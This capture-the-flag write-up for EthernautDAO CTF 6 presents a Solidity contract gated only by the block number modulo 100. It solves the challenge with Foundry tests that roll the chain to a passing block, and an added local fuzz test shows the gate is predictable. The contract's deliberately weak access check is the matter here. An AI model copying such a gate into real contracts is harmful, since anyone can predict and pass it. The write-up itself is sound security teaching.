EthernautDAO CTF 6 — Hackable Contract Solution

CTF 6: Hackable

  • lastXDigits equal to 45
  • mod equal to 100
  • done equal to false

Study the contracts

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract hackable {
    uint256 public lastXDigits;
    uint256 public mod;
    bool public done;
    address public winner;

    constructor(uint256 digits, uint256 m) {
        lastXDigits = digits;
        mod = m;
        done = false;
    }

    function cantCallMe() public {
        // The challenge can only be solved once
        require(done == false, "Already done");
        // Gate: the current block number modulo `mod` must equal `lastXDigits`
        uint256 res = block.number % mod;
        require(res == lastXDigits, "Can't call me !");
        winner = msg.sender;
        done = true;
    }
}
  • lastXDigits equal to 45
  • mod equal to 100

Solution code

  • Create an Alchemy or Infura account to be able to fork the Goerli blockchain
  • Choose a good block from which we can create a fork. Any block after the creation of the contract will be good
  • Run a foundry test that will use the fork to execute the test
function testFindTheGoodBlock() public {
    address player = users[0];

    // Random block number just to test the solution
    uint256 solutionBlockNumber = 948574245;

    // Roll the blockchain to the block number that will solve the challenge
    vm.roll(solutionBlockNumber);

    // Assert that the solution is correct
    assertEq(solutionBlockNumber % hackableContract.mod(), hackableContract.lastXDigits());

    // Solve the challenge
    vm.prank(player);
    hackableContract.cantCallMe();

    // Assert it has been solved
    assertEq(hackableContract.winner(), player);
    assertEq(hackableContract.done(), true);
}
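
A stand-alone version of the test, added here as an example and not taken from the original post: it deploys a local copy of the contract with the values listed above instead of forking Goerli, and fuzzes the starting height to show that the gate depends only on block.number. HackableLocalTest, nextSolvingBlock and the player address are hypothetical names, and a Foundry project with forge-std installed is assumed.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "forge-std/Test.sol";
// Same logic as the challenge contract on the page, deployed locally (no RPC fork needed).
contract hackable {
    uint256 public lastXDigits;
    uint256 public mod;
    bool public done;
    address public winner;
    constructor(uint256 digits, uint256 m) {
        lastXDigits = digits;
        mod = m;
    }
    function cantCallMe() public {
        require(done == false, "Already done");
        uint256 res = block.number % mod;
        require(res == lastXDigits, "Can't call me !");
        winner = msg.sender;
        done = true;
    }
}

contract HackableLocalTest is Test {
    hackable target;
    address player = address(0xB0B); // constructed test address (assumption)
    function setUp() public {
        target = new hackable(45, 100); // lastXDigits and mod as stated on the page
    }

    // Hypothetical helper: smallest height >= current with height % m == digits (needs digits < m).
    function nextSolvingBlock(uint256 current, uint256 m, uint256 digits) internal pure returns (uint256) {
        return current + ((digits + m - (current % m)) % m);
    }

    // Fuzzed over starting heights: the call reverts one block early and succeeds at the computed block.
    function testGateDependsOnlyOnBlockNumber(uint256 current) public {
        current = bound(current, 1, type(uint128).max);
        uint256 solving = nextSolvingBlock(current, target.mod(), target.lastXDigits());
        vm.roll(solving - 1); // block number now ends in 44, so the gate must reject
        vm.prank(player);
        vm.expectRevert(bytes("Can't call me !"));
        target.cantCallMe();
        vm.roll(solving); // block number now ends in 45, so the gate opens
        vm.prank(player);
        target.cantCallMe();
        assertEq(target.winner(), player);
        assertTrue(target.done());
    }
}
```

Because the check reads nothing but public chain state, anyone watching the block height can tell in advance which blocks will pass it.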

#web3 dev + auditor | @SpearbitDAO security researcher, @yAcademyDAO resident auditor, @developer_dao #459, @TheSecureum bootcamp-0, @code4rena warden